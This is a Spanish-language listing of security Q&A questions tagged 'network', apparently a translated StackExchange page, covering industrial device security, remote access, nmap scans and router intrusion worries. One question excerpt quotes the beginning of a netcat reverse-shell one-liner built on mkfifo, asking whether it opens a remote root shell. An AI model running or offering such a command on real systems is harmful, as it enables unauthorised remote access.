Preguntas con etiqueta 'network'

2
respuestas

¿Cómo se diseñaría la seguridad en dispositivos industriales con acceso a Internet / redes que funcionarán durante décadas donde el mal funcionamiento podría costar vidas? [cerrado]

La tendencia actual es hacer que todos los dispositivos sean accesibles desde Internet por razones de conveniencia, económicas, etc. (a veces incluso incluyendo la estación de control de una planta de energía). Pero muchas soluciones industri...
hecha 28.12.2015 - 21:40
2
respuestas

El acceso remoto a través de la máquina virtual, ¿pondrá en peligro la red?

Actualmente estoy trabajando en un proyecto para una de las organizaciones y tengo que instalar un nuevo programa de software (servidor / cliente). Sin embargo, la compañía de software desea ayudar e instalar por sí misma para minimizar cualquie...
hecha 21.09.2017 - 03:34
1
respuesta

El navegador da acceso al directorio raíz a través de "/" [cerrado]

Si pongo una '/' en mi navegador, tengo acceso completo a mi directorio raíz. He intentado lo mismo en otra computadora y no funcionó. Entonces, estoy tratando de no ser paranoico, pero esto es muy extraño. He intentado verificar los puertos abi...
hecha 28.10.2014 - 02:25
2
respuestas

¿Las conexiones largas son una vulnerabilidad de seguridad?

En un breve resumen, ¿se pueden crear conexiones largas como una vulnerabilidad de seguridad? Por conexiones largas me refiero a conexiones donde durante un largo período de tiempo los datos no se envían en absoluto. Por ejemplo, ¿la conexión cl...
hecha 16.02.2017 - 09:35
5
respuestas

¿Puede ocultar su dispositivo del escáner de red?

La contraseña de mi enrutador ha cambiado muchas veces, así que me pregunto si alguien la cambió. Usé Fing para escanear algún dispositivo y no se detectó ningún dispositivo sospechoso. Pero todavía no estoy seguro de si alguien no lo hackeó.  ...
hecha 29.01.2017 - 12:36
3
respuestas

pregunta de elementos cibernéticos del firewall de límite

He estado revisando el cuestionario cyber essentials y esta pregunta es confusa yo y yo nos preguntábamos si podrían proporcionarnos alguna información al respecto. en una de las 5 secciones 'Cortafuegos de límites y puertas de enlace de In...
hecha 08.02.2017 - 12:56
2
respuestas

can pipe | cáscara tubo nc lograr shell remoto?

En uno de los artículos en los que me topé con una vulnerabilidad de los dispositivos Dell que decía que cuando disparas la siguiente línea de código (ejecutada en algún lugar de PHP) obtendrás un shell raíz remoto: mkfifo /tmp/f;cat /tmp/f|/b...
hecha 14.03.2014 - 01:18
3
respuestas

¿Qué obtiene exactamente uno de un Nmap Scan?

Sé que nmap es un escáner de puertos y su salida muestra todos los puertos abiertos, los servicios que se ejecutan en esos puertos, el sistema operativo subyacente y la tecnología, etc. ¿Qué se debe tomar de este resultado en los términos más fá...
hecha 06.06.2014 - 13:20
2
respuestas

¿La dirección IP de la computadora utilizada por otra persona en una red cerrada?

Recibí una alerta en el nuevo OSX (el más nuevo Macbook Air) y en la red de Eduroam que otra máquina utiliza mi dirección IP. Esta es mi primera vez en la vida. Creo que me han atacado porque estaba haciendo una investigación importante en el...
hecha 30.09.2014 - 10:37
2
respuestas

Nmap escanea la lista de dominios y proporciona booleano si está arriba / abajo

Tengo una lista de dominios separados por una nueva línea en los que me gustaría realizar un escaneo de nmap arbitrario (por ejemplo, agresivo, syn) y me gustaría mostrar un valor booleano que indique si hay puertos abiertos. La función principa...
hecha 20.10.2014 - 18:22